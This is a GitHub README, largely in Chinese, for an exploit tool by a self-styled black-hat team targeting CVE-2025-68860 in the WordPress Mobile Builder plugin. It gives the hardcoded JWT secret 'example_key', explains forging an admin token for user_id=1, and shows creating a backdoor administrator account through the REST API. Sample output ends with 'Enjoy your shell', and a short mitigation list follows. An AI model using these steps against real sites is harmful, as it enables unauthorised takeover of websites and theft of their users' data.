DedsecTeam-BlackHat/CVE-2025-68860

GitHub: DedsecTeam-BlackHat/CVE-2025-68860

针对 WordPress Mobile Builder 插件 JWT 硬编码密钥漏洞的自动化利用脚本,可伪造管理员令牌并创建后门账户实现站点接管。

Stars: 0 | Forks: 0

# WordPress Mobile Builder <= 1.4.2 - 身份验证失效 (CVE-2025-68860) ## 描述 WordPress Mobile builder 插件 1.4.2 及以下版本存在 Broken Authentication 漏洞,允许攻击者使用默认密钥 "example_key" 生成有效的 JWT token,并以管理员身份 (user_id=1) 进行认证。利用该 token,攻击者可以创建新的管理员账户并接管网站。 ## 漏洞详情 CVE: CVE-2025-68860 原因: 对 JWT 使用了硬编码的 secret key "example_key",且缺乏充分的验证。 漏洞位置: 在 Mobile builder 插件中,处理 JWT 认证的文件(例如 class-jwt-auth.php)使用了值为 'example_key' 的常量 JWT_SECRET。此 Secret 无法通过设置更改,因此攻击者可以为任何 user_id 生成 token。 影响: 攻击者可以为 user_id=1(管理员)生成 token,访问 REST API endpoint,并创建具有管理员角色的新用户。 CVSS: High (分数 8.8) - 网络向量,无需用户交互。 ## 漏洞利用原理 1. 脚本使用包含 ```user_id: 1 (admin) 和 secret "example_key"``` 的 payload 生成一个 JWT token。 2. 该 token 用于访问 ```/wp-json/wp/v2/users/``` 以验证管理员权限。 3. 如果成功,脚本向 ```/wp-json/wp/v2/users``` 发送 POST 请求,创建一个用户名为 dedsec1337、密码为 admin、邮箱为 dedsec1337@gmail.com 且角色为管理员的新用户。 4. 输出显示凭证和 API 响应。 ## 环境要求 ``` Python 3.6+ Library: requests, PyJWT, colorama Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif. ``` ## 安装说明 ``` git clone https://github.com/username/CVE-2025-68860 cd CVE-2025-68860 pip install -r requirements.txt ``` ## 输出示例 ``` ╔═══════════════════════════════════════════════════════════════════╗ ║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║ ║ CVE-2025-68860 Priority: HIGH ║ ║ Dedsec Team Exploit ║ ╚═══════════════════════════════════════════════════════════════════╝ Exploit by : Dedsec Team Exploit Telegram : @DedsecTeam1337 GitHub : https://github.com/DedsecTeam-BlackHat [INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication [INFO] All old exploits/settings are ignored, running this vector only. Site URL (example: http://target.site): http://localhost/wordpress [INFO] Generating JWT as admin (user_id=1)... eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9... -------------------------------------------------------------- [INFO] Testing JWT at /wp-json/wp/v2/users/me [SUCCESS] JWT valid! Confirmed admin access. -------------------------------------------------------------- [INFO] Creating admin account using exploit... [INFO] Exploiting, please wait... [SUCCESS] ✅ Admin user created successfully! ==============[ New Admin Credentials ]============== Username : dedsec1337 Password : admin Email : dedsec1337@gmail.com =================================================== Full API response: { "id": 3, "username": "dedsec1337", "name": "dedsec1337", "email": "dedsec1337@gmail.com", "roles": ["administrator"] } -------------------------------------------------------------- [SUCCESS] Exploit finished. Enjoy your shell. ... ``` ## 危害 1. 攻击者可以创建新的管理员账户,访问 WordPress 的所有功能,安装恶意插件,篡改内容,窃取用户数据,或利用该网站发起进一步攻击。 2. 此漏洞可被远程利用,无需事先认证。 3. 影响:导致 WordPress 网站完全沦陷。 ## 缓解措施 1. 立即将 Mobile builder 插件更新至最新版本 (>=1.4.3)。 2. 如果没有可用的更新,请暂时停用该插件。 3. 检查您的网站上是否存在可疑用户。 4. 使用 Web 应用防火墙 (WAF) 来阻止针对 REST API endpoint 的可疑请求。 5. 作为临时措施,修改插件代码中的 secret key(如果可能)并限制对 REST API 的访问。
标签:Broken Authentication, CVE-2025-68860, JWT攻击, REST API滥用, Web安全, WordPress插件漏洞, 协议分析, 权限提升, 硬编码密钥, 移动端构建器, 管理员接管, 蓝队分析, 身份验证绕过, 逆向工具